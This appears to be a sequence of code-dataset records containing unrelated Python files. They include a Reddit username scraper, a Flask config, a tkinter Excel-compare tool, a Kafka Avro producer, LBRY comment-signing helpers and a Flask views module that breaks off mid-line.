self.sub.scraper_post_limit\n\t\ttype = self.sub.post_type\n\n\t\tcount = 1\n\n\t\t#for post in self.reddit.subreddit(self.sub.subName).new(limit=forceLimit):\n\n\t\tposts = []\n\n\t\tif type == \"new\":\n\t\t\tposts = self.reddit.subreddit(self.sub.subName).new(limit=forceLimit)\n\t\telif type == \"hot\":\n\t\t\tposts = self.reddit.subreddit(self.sub.subName).hot(limit=forceLimit)\n\t\telif type == \"controversial\":\n\t\t\tposts = self.reddit.subreddit(self.sub.subName).controversial(limit=forceLimit)\n\n\t\tfor post in posts:\n\t\t\t#print(post.title)\n\t\t\tcomments = post.comments.list()\n\t\t\tfor comment in comments:\n\t\t\t\ttry:\n\t\t\t\t\tauthor = str(comment.author)\n\n\t\t\t\t\t#Limit number of scrapes\n\t\t\t\t\tif(count > forceLimit):\n\t\t\t\t\t\treturn\n\n\t\t\t\t\tif(self.addUser(author)):\n\t\t\t\t\t\tself.sub.logMe(\"Scraping user: \" + str(comment.author) + \" #\" + str(count))\n\t\t\t\t\t\tcount = count + 1\n\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tprint(\"Unknown error!\")\n\n\tdef addUser(self, username):\n\t\tif username in self.existing_users:\n\t\t\tself.sub.logMe(\"Duplicate found (\" + username + \")\")\n\t\telse:\n\t\t\tself.users_found.append(username)\n\n\t\t\t#Add individual users one-by-one to the scraper file (append, not overwrite)\n\t\t\twith open(self.sub.scraper_users, 'a') as f:\n\t\t\t\tf.write(\"%s\\n\" % username)\n\n\t\t\treturn True\n\t\treturn False\n","sub_path":"runscrape.py","file_name":"runscrape.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"533361274","text":"import os\nimport sys\n\nbasedir = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n\n# SQLite URI compatible\nWIN = sys.platform.startswith('win')\nif WIN:\n prefix = 'sqlite:///'\nelse:\n prefix = 'sqlite:////'\n\n\nclass BaseConfig:\n SECRET_KEY = os.getenv('SECRET_KEY', 'esterTion')\n\n ADMIN_EMAIL = os.getenv('ADMIN_EMAIL', '150402207@sut.edu.cn')\n\n\nclass DevelopmentConfig(BaseConfig):\n DEBUG = True\n\n SQLALCHEMY_DATABASE_URI = prefix + os.path.join(basedir, 'data-dev.db')\n\n\nclass TestingConfig(BaseConfig):\n TESTING = True\n\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' # in-memory database\n\n\nclass ProductionConfig(BaseConfig):\n DEBUG = False\n\n\nconfig = {\n 'development': DevelopmentConfig,\n 'testing': TestingConfig,\n 'production': ProductionConfig,\n 'default': ProductionConfig\n}\n","sub_path":"main/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"433227347","text":"import pandas as pd\r\nimport tkinter as tk\r\nfrom tkinter.ttk import Combobox\r\nfrom tkinter import filedialog\r\n\r\nroot = tk.Tk()\r\n\r\n#Changes the window size\r\nroot.geometry(\"400x400+120+120\")\r\n\r\n# Reads the excel file so you can work with it in python\r\n#Will replace this with buttons to export your chosen file\r\n\r\n#Home\r\ndf1 = pd.read_excel(r'C:\\Users\\Rislynn\\Documents\\Python Pandas Excels\\VizData.xlsx')\r\ndf2 = pd.read_excel(r'C:\\Users\\Rislynn\\Documents\\Python Pandas Excels\\CustomerData.xlsx')\r\n\r\n#work\r\n#df1 = pd.read_excel(r'C:\\Users\\Tonya.Reeves\\Documents\\Python\\ExcelComparev1\\VizData.xlsx')\r\n#df2 = pd.read_excel(r'C:\\Users\\Tonya.Reeves\\Documents\\Python\\ExcelComparev1\\CustomerData.xlsx')\r\n\r\n#Below to for potential use\r\n#df1 = pd.DataFrame()\r\n#df2 = pd.DataFrame()\r\n\r\n# Returns the list of columns\r\ndf1columns = df1.columns\r\ndf2columns = df2.columns\r\n\r\n#Initializes a list of the columns to be used in the combo box\r\ndf1column_list = []\r\ndf2column_list = []\r\n\r\ndef column_list_creator(dfxcolumns,dfxcol_list):\r\n#Creates a list out of the data frame columns\r\n #dfxcolumns are the columns of the data frame\r\n #dfxcol_list is the list you would like the columns inserted into\r\n for i in range(len(dfxcolumns)):\r\n dfxcol_list.append(dfxcolumns[i])\r\n return dfxcol_list\r\n\r\ndf1column_list = column_list_creator(df1columns,df1column_list)\r\ndf2column_list = column_list_creator(df2columns,df2column_list)\r\n\r\n#Will be used for letting the user import the excel\r\n#currently doesn't work as intended\r\ndef getexcel1():\r\n #global df\r\n import_file_path = filedialog.askopenfilename()\r\n df1 = pd.read_excel(import_file_path)\r\n\r\n\r\ndef getexcel2():\r\n #global df2\r\n import_file_path = filedialog.askopenfilename()\r\n df2 = pd.read_excel(import_file_path)\r\n return df2 #print(df2)\r\n\r\n\r\n#End user will add values to this list using the drop down\r\ndf1columns_keep = []\r\ndf2columns_keep = []\r\n# this list must be in the order you want in the resulting excel.\r\n# First set of columns will be the predicate columns and after that must be ordered to match df2\r\n\r\ndef clear_listbox(lb_dfxcols_keep):\r\n #Deletes all entries of the list box\r\n lb_dfxcols_keep.delete(0, \"end\")\r\n\r\ndef update_listbox(dfxcolumns_keep,lb_dfxcols_keep):\r\n #populates the listbox\r\n for cols in dfxcolumns_keep:\r\n lb_dfxcols_keep.insert(\"end\", cols)\r\n\r\ndef add_col(combodfx,dfxcolumns_keep,lb_dfxcols_keep):\r\n #Adds the selected value from the drop down to our list\r\n x = combodfx.get() #Gets the currently selected value from the combo (drop) box\r\n if x != 'select':\r\n dfxcolumns_keep.append(x) #adds the value of the drop box to the list of columns\r\n #Refreshes the list box to reflect the changes\r\n clear_listbox(lb_dfxcols_keep)\r\n update_listbox(dfxcolumns_keep, lb_dfxcols_keep)\r\n\r\ndef del_col(combodfx,dfxcolumns_keep,lb_dfxcols_keep):\r\n x = combodfx.get()\r\n if x != 'select':\r\n dfxcolumns_keep.remove(x)\r\n #Refreshes the list box to reflect the changes\r\n clear_listbox(lb_dfxcols_keep)\r\n update_listbox(dfxcolumns_keep, lb_dfxcols_keep)\r\n\r\ndef move_down(combodfx,dfxcolumns_keep,lb_dfxcols_keep):\r\n x = combodfx.get()\r\n if x != 'select':\r\n oldindex = dfxcolumns_keep.index(x)\r\n newindex = oldindex + 1\r\n dfxcolumns_keep.remove(x)\r\n dfxcolumns_keep.insert(newindex, x)\r\n #Refreshes the list box to reflect the changes\r\n clear_listbox(lb_dfxcols_keep)\r\n update_listbox(dfxcolumns_keep, lb_dfxcols_keep)\r\n\r\ndef move_up(combodfx,dfxcolumns_keep,lb_dfxcols_keep):\r\n x = combodfx.get()\r\n if x != 'select':\r\n oldindex = dfxcolumns_keep.index(x)\r\n newindex = oldindex - 1\r\n #Deletes the current entry\r\n dfxcolumns_keep.remove(x)\r\n #Adds the entry into the list at the desired location\r\n dfxcolumns_keep.insert(newindex, x)\r\n #Refreshes the list box to reflect the changes\r\n clear_listbox(lb_dfxcols_keep)\r\n update_listbox(dfxcolumns_keep, lb_dfxcols_keep)\r\n\r\n#Need a function to take the columns you're keeping and create a dataframe\r\n#Then merge the resulting data frames\r\n#And create variance columns\r\n#Lastly save the excel\r\n\r\n#doesn't work yet\r\ndef update_combo_list():\r\n list = column_list_creator(df1columns,df1column_list)\r\n combodf1['values']= list\r\n\r\n#Following 3 lines create the combo box aka drop down list\r\n#Left\r\n#combodf1 = Combobox(root, values=df1column_list, width=15)\r\ncombodf1 = Combobox(root, postcommand = update_combo_list, width=15)\r\ncombodf1.set(\"select\")\r\ncombodf1.grid(row=2, column=0)\r\n\r\n\r\n\r\n#Right\r\ncombodf2 = Combobox(root, values=df2column_list, width=15)\r\ncombodf2.set(\"select\")\r\ncombodf2.grid(row=2, column=1)\r\n\r\n#Creates the listboxes\r\n#Left\r\nlb_df1cols_keep = tk.Listbox(root)\r\nlb_df1cols_keep.grid(row=8, column=0)\r\n\r\n#Right\r\nlb_df2cols_keep = tk.Listbox(root)\r\nlb_df2cols_keep.grid(row=8, column=1)\r\n\r\n# Functions for the buttons, they can't have arguments so need to use lambdas or wrappers\r\ndef add_col1():\r\n return add_col(combodf1, df1columns_keep, lb_df1cols_keep)\r\ndef del_col1():\r\n return del_col(combodf1, df1columns_keep, lb_df1cols_keep)\r\ndef move_down1():\r\n return move_down(combodf1, df1columns_keep, lb_df1cols_keep)\r\ndef move_up1():\r\n return move_up(combodf1, df1columns_keep, lb_df1cols_keep)\r\n\r\n#Wrappers for df2\r\ndef add_col2():\r\n return add_col(combodf2, df2columns_keep, lb_df2cols_keep)\r\ndef del_col2():\r\n return del_col(combodf2, df2columns_keep, lb_df2cols_keep)\r\ndef move_down2():\r\n return move_down(combodf2, df2columns_keep, lb_df2cols_keep)\r\ndef move_up2():\r\n return move_up(combodf2, df2columns_keep, lb_df2cols_keep)\r\n\r\n#Buttons\r\n#Import Buttons\r\nimport_btn_1 = tk.Button(root, text=\"Import Excel 1\", command=getexcel1).grid(row=0, column=0)\r\nimport_btn_2 = tk.Button(root, text=\"Import Excel 2\", command=getexcel2).grid(row=0, column=1)\r\n\r\n#Left Buttons\r\nleft_add = tk.Button(root, text=\"Add\", command=add_col1).grid(row=4, column=0)\r\nleft_del = tk.Button(root, text=\"Delete\", command=del_col1).grid(row=5, column=0)\r\nleft_up = tk.Button(root, text=\"Dwn\", command=move_down1).grid(row=7, column=0)\r\nleft_dwn = tk.Button(root, text=\"Up\", command=move_up1).grid(row=6, column=0)\r\n\r\n#Right Buttons\r\nright_add = tk.Button(root, text=\"Add\", command=add_col2).grid(row=4, column=1)\r\nright_del = tk.Button(root, text=\"Delete\", command=del_col2).grid(row=5, column=1)\r\nright_up = tk.Button(root, text=\"Dwn\", command=move_down2).grid(row=7, column=1)\r\nright_dwn = tk.Button(root, text=\"Up\", command=move_up2).grid(row=6, column=1)\r\n\r\n#Adds the text for Number Key Columns\r\nlbl_title = tk.Label(root, text=\"Enter the number of key columns\")\r\nlbl_title.grid(row=9, column=0)\r\n\r\n#Adds free entry field for number of key columns\r\ntxt_input = tk.Entry(root, width=15)\r\ntxt_input.grid(row=9, column=1)\r\n\r\n#Button for Merging\r\nmerge_btn = tk.Button(root, text=\"Merge\", command=move_up2).grid(row=10, column=1)\r\n\r\nroot.mainloop()\r\n\r\n#Need to not let the user add the same column twice\r\n#Columns to keep list size must be the same for both data frames\r\n\r\n#Error handling for move up/down/delete if the items doesn't exist","sub_path":"ExcelComparev3.py","file_name":"ExcelComparev3.py","file_ext":"py","file_size_in_byte":7204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"263551128","text":"\"\"\"\nfilename: confluent_kafka.py\nname: confluent_kafka\n\ndescription:\nworking with kafka confluent. reading data from read files class and sending to\nkafka using schema registry option. also using some producer settings\n\"\"\"\n\n# import libraries\nfrom libs import read_files\nfrom confluent_kafka import avro\nfrom confluent_kafka.avro import AvroProducer\nfrom configs import config\nfrom random import seed\n\n# incremental seed of 1\nseed(1)\n\n\nclass Kafka(object):\n\n # use __slots__ to explicitly declare all schema members\n __slots__ = [\"review_id\", \"business_id\", \"user_id\", \"stars\", \"useful\", \"date\"]\n\n # define init function based on the expected input\n def __init__(self, review_id=None, business_id=None, user_id=None, stars=None, useful=None, date=None):\n\n self.review_id = review_id\n self.business_id = business_id\n self.user_id = user_id\n self.stars = stars\n self.useful = useful\n self.date = date\n\n # avro does not support code generation\n # need to provide dict representation\n def to_dict(self):\n\n return {\n \"review_id\": self.review_id,\n \"business_id\": self.business_id,\n \"user_id\": self.user_id,\n \"stars\": self.stars,\n \"useful\": self.useful,\n \"date\": self.date\n }\n\n # delivery reports for producer.poll\n # callback with extra argument\n def on_delivery(self, err, msg, obj):\n\n if err is not None:\n print('message delivery failed for user {} with error {}'.format(obj.name, err))\n else:\n print('message successfully produced to {} [{}] at offset {}'.format(msg.topic(), msg.partition(), msg.offset()))\n\n def avro_producer(self, broker, schema_registry, topic, gen_dt_rows):\n\n # avro schema [key] & [value]\n key_schema_str = config.key_schema_str\n value_schema_str = config.value_schema_str\n\n # load avro definition\n key_schema = avro.loads(key_schema_str)\n value_schema = avro.loads(value_schema_str)\n\n # get data to insert\n get_data = read_files.CSV().csv_reader(gen_dt_rows)\n\n # init producer using key & value schema\n producer = AvroProducer(\n {\n # client id\n \"client.id\": 'sr-py-yelp-stream-app',\n # kafka broker server\n \"bootstrap.servers\": broker,\n # schema registry url\n \"schema.registry.url\": schema_registry,\n # eos = exactly once semantics [options]\n \"enable.idempotence\": \"true\",\n \"max.in.flight.requests.per.connection\": 1,\n \"retries\": 100,\n \"acks\": \"all\",\n # max number of messages batched in one message set\n \"batch.num.messages\": 1000,\n # delay in ms to wait for messages in queue\n \"queue.buffering.max.ms\": 100,\n # max number of messages on queue\n \"queue.buffering.max.messages\": 1000,\n # wait messages in queue before send to brokers (batch)\n \"linger.ms\": 100\n },\n default_key_schema=key_schema,\n default_value_schema=value_schema)\n\n # loop to insert data\n inserts = 0\n while inserts < len(get_data):\n\n # instantiate new records, execute callbacks\n record = Kafka()\n\n try:\n\n # map columns and access using dict values\n record.review_id = get_data[inserts]['review_id']\n record.business_id = get_data[inserts]['business_id']\n record.user_id = get_data[inserts]['user_id']\n record.stars = get_data[inserts]['stars']\n record.useful = get_data[inserts]['useful']\n record.date = get_data[inserts]['date']\n\n # print(record.to_dict())\n\n # server on_delivery callbacks from previous asynchronous produce()\n producer.poll(0)\n\n # message passed to the delivery callback will already be serialized.\n # to aid in debugging we provide the original object to the delivery callback.\n producer.produce(\n topic=topic,\n key={'review_id': record.review_id},\n value=record.to_dict(),\n callback=lambda err, msg, obj=record: self.on_delivery(err, msg, obj)\n )\n\n except BufferError:\n print(\"buffer full\")\n producer.poll(0.1)\n\n except ValueError:\n print(\"invalid input\")\n raise\n\n except KeyboardInterrupt:\n raise\n\n # increment values\n inserts += 1\n\n print(\"flushing records...\")\n\n # buffer messages to send\n producer.flush()\n","sub_path":"producer/reviews/libs/sr_confluent_kafka.py","file_name":"sr_confluent_kafka.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"178342280","text":"import sublime, sublime_plugin\nfrom .utils import *\nfrom .CleverDelete import clean_up_right, clean_up_left\n\n\ndef test():\n\tx = a + b * c-1\n\tx += a * b * [plop(c + d) + 1, c(), p]\n\tx = -5 - 4.0 + .9\n\tself.view.sel().clear((a * b), m)\n\t# a = self . view .9\n\t# c++\n\t# x = -5 - 4.0e5\n\t# int x = p->test();\n\t# int x = 5*p;\n\n\nclass CleverMoveCommand(sublime_plugin.TextCommand):\n\n\tdef run(self, edit, type, direction):\n\t\tforward = direction == \"forward\"\n\n\t\tregions = list(self.view.sel())\n\n\t\tself.view.sel().clear()\n\n\t\tfor region in reversed(regions):\n\t\t\tbegin, end = region.begin(), region.end()\n\n\t\t\tif forward:\n\t\t\t\tend = max(find_piece_end(self.view, begin, end, forward), end + 1)\n\t\t\t\t# end = clean_up_right(self.view, begin, end)\n\t\t\t\tregion = sublime.Region(end, end)\n\t\t\telse:\n\t\t\t\tbegin = min(find_piece_end(self.view, begin, end, forward), begin - 1)\n\t\t\t\t# begin = clean_up_left(self.view, begin, end)\n\t\t\t\tregion = sublime.Region(begin, begin)\n\n\n\t\t\tself.view.sel().add(region)\n\t\t\tself.view.show(region)\n\n\n","sub_path":"CleverMove.py","file_name":"CleverMove.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"4496271","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#### - - coding: latin-1 -*-\n\n# import dependency libraries ..................................................\n\nimport sys, traceback\nfrom fractions import Fraction\n\nfrom lib.enums import Orientation\nfrom lib.logger import Logger, Level\n\n# ..............................................................................\nclass MotorConfigurer():\n '''\n Configures the Thunderborg motor controller. \n '''\n def __init__(self, ros, config, level):\n self._log = Logger(\"mtrconf\", level)\n if config is None:\n raise ValueError('null configuration argument.')\n self._config = config\n\n # ..........................................................................\n def configure(self):\n '''\n Import the ThunderBorg library, then configure and return the Motors.\n '''\n self._log.info('configure thunderborg & motors...')\n try:\n self._log.info('importing ThunderBorg...')\n import lib.ThunderBorg3 as ThunderBorg\n self._log.info('successfully imported ThunderBorg.')\n TB = ThunderBorg.ThunderBorg(Level.INFO) # create a new ThunderBorg object\n TB.Init() # set the board up (checks the board is connected)\n self._log.info('successfully instantiated ThunderBorg.')\n\n if not TB.foundChip:\n boards = ThunderBorg.ScanForThunderBorg()\n if len(boards) == 0:\n self._log.error('No ThunderBorg found, check you are attached :)')\n else:\n self._log.error('No ThunderBorg at address %02X, but we did find boards:' % (TB.i2cAddress))\n for board in boards:\n self._log.info(' %02X (%d)' % (board, board))\n self._log.error('If you need to change the I²C address change the setup line so it is correct, e.g. TB.i2cAddress = 0x{}'.format(boards[0]))\n sys.exit(1)\n TB.SetLedShowBattery(True)\n \n # initialise ThunderBorg ...........................\n self._log.debug('getting battery reading...')\n # get battery voltage to determine max motor power\n # could be: Makita 12V or 18V power tool battery, or 12V line supply\n voltage_in = TB.GetBatteryReading()\n if voltage_in is None:\n raise OSError('cannot continue: cannot read battery voltage.')\n self._log.info('voltage in: {:>5.2f}V'.format(voltage_in))\n # voltage_in = 20.5\n # maximum motor voltage\n voltage_out = 9.0\n self._log.info('voltage out: {:>5.2f}V'.format(voltage_out))\n if voltage_in < voltage_out:\n raise OSError('cannot continue: battery voltage too low ({:>5.2f}V).'.format(voltage_in))\n # Setup the power limits\n if voltage_out > voltage_in:\n _max_power_ratio = 1.0\n else:\n _max_power_ratio = voltage_out / float(voltage_in)\n # convert float to ratio format\n self._log.info('battery level: {:>5.2f}V; motor voltage: {:>5.2f}V; maximum power ratio: {}'.format(voltage_in, voltage_out, \\\n str(Fraction(_max_power_ratio).limit_denominator(max_denominator=20)).replace('/',':')))\n\n except Exception as e:\n self._log.error('unable to import ThunderBorg: {}'.format(e))\n traceback.print_exc(file=sys.stdout)\n sys.exit(1)\n\n # now import motors\n from lib.motors import Motors\n try:\n self._log.info('getting raspberry pi...')\n self._log.info('configuring motors...')\n self._motors = Motors(self._config, TB, Level.INFO)\n self._motors.get_motor(Orientation.PORT).set_max_power_ratio(_max_power_ratio)\n self._motors.get_motor(Orientation.STBD).set_max_power_ratio(_max_power_ratio)\n return self._motors\n except OSError as oe:\n self._log.error('failed to configure motors: {}'.format(oe))\n# sys.stderr = DevNull()\n sys.exit(1)\n\n \n#EOF\n","sub_path":"lib/motor_configurer.py","file_name":"motor_configurer.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"110990853","text":"import argparse\nimport webbrowser\n\n__version__ = \"0.1.0\"\n\nCHROME_PATH = r\"C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s\"\n\n\ndef get_parser():\n \"\"\"\n 解析命令行参数\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Open url with your browser.\")\n parser.add_argument(\n \"url\",\n metavar=\"URL\",\n type=str,\n help=\"the url you want to open with browser\",\n )\n parser.add_argument(\n \"-v\",\n \"--version\",\n action=\"store_true\",\n help=\"displays the current version of `open`\",\n )\n return parser\n\n\ndef command_line_runner():\n \"\"\"\n 执行命令行操作\n \"\"\"\n parser = get_parser()\n args = vars(parser.parse_args())\n\n if args[\"version\"]:\n print(__version__)\n return\n\n if not args[\"url\"]:\n parser.print_help()\n return\n\n webbrowser.get(CHROME_PATH).open(args[\"url\"])\n\n\nif __name__ == \"__main__\":\n command_line_runner()\n","sub_path":"open_browser.py","file_name":"open_browser.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"503307397","text":"import logging\nimport time\nimport hashlib\nimport binascii\n\nimport ecdsa\nfrom lbry import utils\nfrom lbry.crypto.hash import sha256\nfrom lbry.wallet.transaction import Output\n\nlog = logging.getLogger(__name__)\n\n\ndef get_encoded_signature(signature):\n signature = signature.encode() if isinstance(signature, str) else signature\n r = int(signature[:int(len(signature) / 2)], 16)\n s = int(signature[int(len(signature) / 2):], 16)\n return ecdsa.util.sigencode_der(r, s, len(signature) * 4)\n\n\ndef cid2hash(claim_id: str) -> bytes:\n return binascii.unhexlify(claim_id.encode())[::-1]\n\n\ndef is_comment_signed_by_channel(comment: dict, channel: Output, abandon=False):\n if isinstance(channel, Output):\n try:\n signing_field = comment['comment_id'] if abandon else comment['comment']\n pieces = [\n comment['signing_ts'].encode(),\n cid2hash(comment['channel_id']),\n signing_field.encode()\n ]\n return Output.is_signature_valid(\n get_encoded_signature(comment['signature']),\n sha256(b''.join(pieces)),\n channel.claim.channel.public_key_bytes\n )\n except KeyError:\n pass\n return False\n\n\ndef sign_comment(comment: dict, channel: Output, abandon=False):\n timestamp = str(int(time.time()))\n signing_field = comment['comment_id'] if abandon else comment['comment']\n pieces = [timestamp.encode(), channel.claim_hash, signing_field.encode()]\n digest = sha256(b''.join(pieces))\n signature = channel.private_key.sign_digest_deterministic(digest, hashfunc=hashlib.sha256)\n comment.update({\n 'signature': binascii.hexlify(signature).decode(),\n 'signing_ts': timestamp\n })\n\n\nasync def jsonrpc_post(url: str, method: str, params: dict = None, **kwargs) -> any:\n params = params or {}\n params.update(kwargs)\n json_body = {'jsonrpc': '2.0', 'id': None, 'method': method, 'params': params}\n async with utils.aiohttp_request('POST', url, json=json_body) as response:\n try:\n result = await response.json()\n return result['result'] if 'result' in result else result\n except Exception as cte:\n log.exception('Unable to decode response from server: %s', cte)\n return await response.text()\n","sub_path":"lbry/extras/daemon/comment_client.py","file_name":"comment_client.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"205674608","text":"class Solution:\n # @param {character[][]} matrix\n # @return {integer}\n def maximalRectangle(self, matrix):\n ## reference: http://www.cnblogs.com/easonliu/p/3657489.html\n if len(matrix) < 1:\n return 0;\n n = len(matrix);\n if n == 0:\n return 0;\n m = len(matrix[0]);\n if m == 0:\n return 0;\n lines = [[0 for i in range(m)] for j in range(n)]\n\n for i in range(n):\n for j in range(m):\n if i == 0:\n lines[i][j] = 1 if matrix[i][j] == '1' else 0;\n else:\n lines[i][j] += lines[i-1][j] + 1 if matrix[i][j] == '1' else 0;\n\n maxRec = 0;\n for i in range(n):\n temRec = self.maxArea(lines[i]);\n maxRec = max(maxRec, temRec);\n\n return maxRec;\n def maxArea(self, line):\n maxArea = 0;\n line.append(0);\n i = 0;\n stack = [];\n while i < len(line):\n if stack == [] or line[stack[-1]] <= line[i]:\n stack.append(i);\n i += 1;\n else:\n t = stack.pop();\n maxArea = max(maxArea, line[t] * (i if stack == [] else i - stack[-1] - 1));\n\n return maxArea;\n\nif __name__ == '__main__':\n obj = Solution();\n print(obj.maximalRectangle([['1','1'], ['1', '1']]))","sub_path":"All Code/No.85 Maximal Rectangle.py","file_name":"No.85 Maximal Rectangle.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"185458858","text":"import copy\nimport json\nimport math\nimport string\nfrom collections import Counter\n\nimport flask\nfrom flask import request\n\nimport core.utils.entity_type as ent\nfrom core.search.query_info import paper_info_db_check_multiquery\nfrom core.search.query_name import (\n affiliation_name_query, author_name_query, conference_name_query,\n fos_name_query, get_conf_journ_display_names, journal_name_query,\n paper_name_query)\nfrom core.search.query_paper import get_all_paper_ids\nfrom core.utils.get_stats import get_stats\nfrom core.utils.load_tsv import tsv_to_dict\nfrom webapp.graph import ReferenceFlower, compare_flowers\nfrom webapp.shortener import decode_filters, url_decode_info, url_encode_info\nfrom webapp.utils import *\n\nfrom webapp.front_end_helper import make_response_data\nfrom webapp.konigsberg_client import KonigsbergClient\n\nkb_client = KonigsbergClient('http://localhost:8081')\n\nflower_leaves = [ ('author', [ent.Entity_type.AUTH])\n , ('conf' , [ent.Entity_type.CONF, ent.Entity_type.JOUR])\n , ('inst' , [ent.Entity_type.AFFI])\n , ('fos' , [ent.Entity_type.FSTD]) ]\nid_helper_dict = {\n \"conference\": \"ConferenceSeriesId\",\n \"journal\": \"JournalId\",\n \"institution\": \"AffiliationId\",\n \"paper\": \"PaperId\",\n \"author\": \"AuthorId\",\n \"topic\": \"FieldOfStudyId\"\n}\n\nNUM_THREADS = 8\nNUM_NODE_INFO = 5\n\n\nblueprint = flask.Blueprint('views', __name__)\n\n\n@blueprint.route('/autocomplete')\ndef autocomplete():\n entity_type = request.args.get('option')\n data = loadList(entity_type)\n return flask.jsonify(data)\n\n\n@blueprint.route('/query')\ndef query():\n entity_type = \"paper\" # support paper search only\n entity_title = request.args.get('title')\n data = filter_papers(entity_title, query_entity([entity_type], entity_title))\n paper_ids = [p[0][id_helper_dict[entity_type]] for p in data]\n doc_id = url_encode_info(paper_ids=paper_ids, name=entity_title)\n url_base = f\"http://influencemap.ml/submit/?id={doc_id}\"\n res = {\n \"search_result\": data,\n \"paper_ids\": paper_ids,\n \"flower_url\": url_base\n }\n return flask.jsonify(res)\n\n\n@blueprint.route('/')\ndef main():\n return flask.render_template(\"main.html\")\n\n\n@blueprint.route('/browse')\ndef browse():\n browse_list = load_gallery()\n return flask.render_template(\n \"browse.html\",\n browse_groups=browse_list, cache_data=[])\n\n\n@blueprint.route('/create', methods=['GET', 'POST'])\ndef create():\n\n json_data = request.form.get('data')\n data = {} if json_data is None else json.loads(json_data)\n keyword = data.get('keyword', '')\n search = data.get('search') == 'true'\n option = data.get('option', '')\n\n # render page with data\n return flask.render_template(\n \"create.html\",\n navbarOption=get_navbar_option(keyword, option),\n search=search)\n\n\n\n@blueprint.route('/curate')\ndef curate():\n types = get_cache_types()\n data = json.loads(request.form.get('data'))\n keyword = data.get('keyword', '')\n search = data.get('search') == 'true'\n option = data.get('option')\n\n # render page with data\n return flask.render_template(\n \"curate.html\",\n navbarOption=get_navbar_option(keyword, option),\n search=search,\n types=types)\n\n\n@blueprint.route('/check_record')\ndef check_record():\n exists, names = check_browse_record_exists(request.form.get(\"type\"), request.form.get(\"name\"))\n return flask.jsonify({\"exists\": exists, \"names\": names})\n\n\n@blueprint.route('/crate_load_file')\ndef curate_load_file():\n filename = request.form.get(\"filename\")\n try:\n data = tsv_to_dict(filename)\n success = \"true\"\n except FileNotFoundError:\n data = {}\n success = \"false\"\n return flask.jsonify({'data': data, 'success': success})\n\n\n\ns = {\n 'author': ('

    {DisplayName}

    Papers: {PaperCount}, Citations: {CitationCount}

    '),\n 'conference': ('

    {DisplayName}

    Papers: {PaperCount}, Citations: {CitationCount}

    '),\n 'institution': ('

    {DisplayName}

    Papers: {PaperCount}, Citations: {CitationCount}

    '),\n 'journal': ('

    {DisplayName}

    Papers: {PaperCount}, Citations: {CitationCount}

    '),\n 'paper': ('

    {OriginalTitle}

    Citations: {CitationCount}

    '),\n 'topic': ('

    {DisplayName} (Level {Level})

    Papers: {PaperCount}, Citations: {CitationCount}

    ')\n}\n\n\n@blueprint.route('/search', methods=['POST'])\ndef search():\n request_data = json.loads(request.form.get(\"data\"))\n keyword = request_data.get(\"keyword\")\n entityType = request_data.get(\"option\")\n exclude = set(string.punctuation)\n keyword = ''.join(ch for ch in keyword if ch not in exclude)\n keyword = keyword.lower()\n keyword = \" \".join(keyword.split())\n\n print(entityType, keyword)\n data = query_entity(entityType, keyword)\n for i in range(len(data)):\n entity = {'data': data[i][0]}\n entity['display-info'] = s[data[i][1]].format(**entity['data'])\n if \"Affiliation\" in entity['data']: entity['display-info'] = entity['display-info'][0:-4] + \", Institution: {}

    \".format(entity['data'][\"Affiliation\"])\n if \"Authors\" in entity['data']: entity['display-info'] += \"

    Authors: {}

    \".format(\", \".join(entity['data'][\"Authors\"]))\n entity['table-id'] = \"{}_{}\".format(data[i][1], entity['data'][id_helper_dict[data[i][1]]])\n data[i] = entity\n return flask.jsonify({'entities': data})\n\n\n\n@blueprint.route('/manualcache', methods=['POST'])\ndef manualcache():\n cache_dictionary = (json.loads(request.form.get('cache')))\n paper_action = request.form.get('paperAction')\n #saveNewBrowseCache(cache_dictionary)\n\n if paper_action == \"batch\":\n paper_ids = get_all_paper_ids(cache_dictionary[\"EntityIds\"])\n addToBatch(paper_ids)\n if paper_action == \"cache\":\n paper_ids = get_all_paper_ids(cache_dictionary[\"EntityIds\"])\n paper_info_db_check_multiquery(paper_ids)\n return flask.jsonify({})\n\n\n@blueprint.route('/submit/', methods=['GET', 'POST'])\ndef submit():\n pub_years = None\n cit_years = None\n self_citations = False\n coauthors = True\n if request.method == \"GET\":\n doc_id = request.args[\"id\"]\n ids, flower_name, curated_flag = url_decode_info(doc_id)\n author_ids = ids.author_ids\n affiliation_ids = ids.affiliation_ids\n conference_ids = ids.conference_series_ids\n fos_ids = ids.field_of_study_ids\n journal_ids = ids.journal_ids\n paper_ids = ids.paper_ids\n\n encoded_filters = request.args.get(\"filters\")\n if encoded_filters is not None:\n decoded_filters = decode_filters(encoded_filters)\n pub_years = decoded_filters.pub_years\n cit_years = decoded_filters.cit_years\n self_citations = decoded_filters.self_citations\n coauthors = decoded_filters.coauthors\n else:\n curated_flag = False\n data_str = request.form['data']\n data = json.loads(data_str)\n entities = data['entities']\n author_ids = list(map(int, entities['AuthorIds']))\n affiliation_ids = list(map(int, entities['AffiliationIds']))\n conference_ids = list(map(int, entities['ConferenceIds']))\n journal_ids = list(map(int, entities['JournalIds']))\n paper_ids = list(map(int, 